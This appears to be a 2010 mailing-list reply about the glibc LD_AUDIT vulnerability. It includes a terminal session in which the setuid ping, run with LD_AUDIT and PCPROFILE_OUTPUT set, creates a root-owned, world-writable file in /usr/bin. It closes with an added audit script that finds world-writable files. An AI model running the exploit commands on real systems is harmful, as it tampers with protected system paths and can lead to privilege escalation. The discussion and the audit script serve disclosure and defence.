On 10/24/2010 09:48 PM, Bruce Dubbs wrote:
> Bryan Kadzban wrote:
>
>> Ah, I think I see. You have to put libbad.so into /lib64 (emulating
>> libpcprofile), then set LD_AUDIT to just "libbad.so.0", with no path.
>> At that point it works as expected (at least for me). (Though this is a
>> multilib setup. But ping is 64-bit; on a single-bit-width system you
>> should be able to just use /lib instead.)
>
> I don't understand this issue. Wouldn't you need root to add anything
> to /lib64 (which should be a symlink to /lib on LFS)? If you can do
> that, there are a lot of easier ways to get a root shell.
>
> -- Bruce
No. The original exploit has two parts. The link that Bryan posted has full details. See below:

dj [ ~ ]$ ls -l /usr/bin/bad
ls: cannot access /usr/bin/bad: No such file or directory
dj [ ~ ]$ umask 0
dj [ ~ ]$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/usr/bin/bad" ping
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
ping: missing host operand
Try `ping --help' or `ping --usage' for more information.
dj [ ~ ]$ ls -l /usr/bin/bad
-rw-rw-rw- 1 root dj 4 Oct 25 01:28 /usr/bin/bad
dj [ ~ ]$ rm /usr/bin/bad
rm: cannot remove `/usr/bin/bad': Permission denied
dj [ ~ ]$ chmod 775 /usr/bin/bad
chmod: changing permissions of `/usr/bin/bad': Operation not permitted
dj [ ~ ]$ echo blah > /usr/bin/bad
dj [ ~ ]$ cat /usr/bin/bad
blah
dj [ ~ ]$ sudo rm /usr/bin/bad
dj [ ~ ]$

The file is not executable, so not much can be done with it (without utilizing cron as was done in the original example). Regardless, creating world-writable files anywhere in the filesystem is bad. Even without cron as a means to get a root shell, this is dangerous enough. A simple DoS attack to fill the root file system might screw up the nightly backups, for instance. Granted, there are multiple audit trails using that method...

-- DJ Lucas
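A defender's check that follows from DJ's last paragraph, added here as an example and not part of the original mail or of LFS: a small POSIX sh audit that lists world-writable regular files under a directory tree, the kind of artifact the session above leaves in /usr/bin. The make_fixture function builds a constructed throwaway tree (its file names are invented for the test) so the audit can be exercised without touching the real system; -type f is deliberate, since sticky world-writable directories such as /tmp are normal while a world-writable regular file under /usr/bin or /lib is not.

```shell
#!/bin/sh
# Added example (not from the original mail): audit a tree for world-writable
# regular files. Directory and file names in make_fixture are constructed.

# find_world_writable DIR
# Prints the path of every regular file under DIR (same filesystem only)
# whose mode grants write permission to "others" (the 0002 bit).
# Directories are skipped on purpose: a sticky 1777 /tmp is expected,
# whereas a mode 666 file in /usr/bin, /lib or /etc is a finding.
find_world_writable() {
    find "$1" -xdev -type f -perm -002 -print
}

# count_world_writable DIR
# Number of findings as a bare integer; 0 means the tree is clean, which
# makes it usable as a pass/fail signal from a nightly job.
count_world_writable() {
    find_world_writable "$1" | wc -l | tr -d ' '
}

# make_fixture
# Builds a constructed, throwaway tree mimicking the state after the session
# in the mail and prints its root:
#   usr/bin/bad   mode 666  (the dropped file; must be reported)
#   usr/bin/good  mode 755  (a normal binary; must not be reported)
#   tmp/scratch   mode 644  inside a sticky 1777 tmp (must not be reported)
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/tmp"
    chmod 1777 "$root/tmp"
    printf 'blah\n' > "$root/usr/bin/bad"
    chmod 666 "$root/usr/bin/bad"
    printf '#!/bin/sh\n' > "$root/usr/bin/good"
    chmod 755 "$root/usr/bin/good"
    printf 'scratch\n' > "$root/tmp/scratch"
    chmod 644 "$root/tmp/scratch"
    printf '%s\n' "$root"
}

# When run as a script with a directory argument, print the findings; with
# no argument the file only defines the functions so it can be sourced.
if [ -n "${1:-}" ]; then
    find_world_writable "$1"
fi
```

Run it as "sh wwaudit.sh /usr" (or /lib, /etc) on the real system; any output at all deserves a look, since nothing in those trees should be writable by every user.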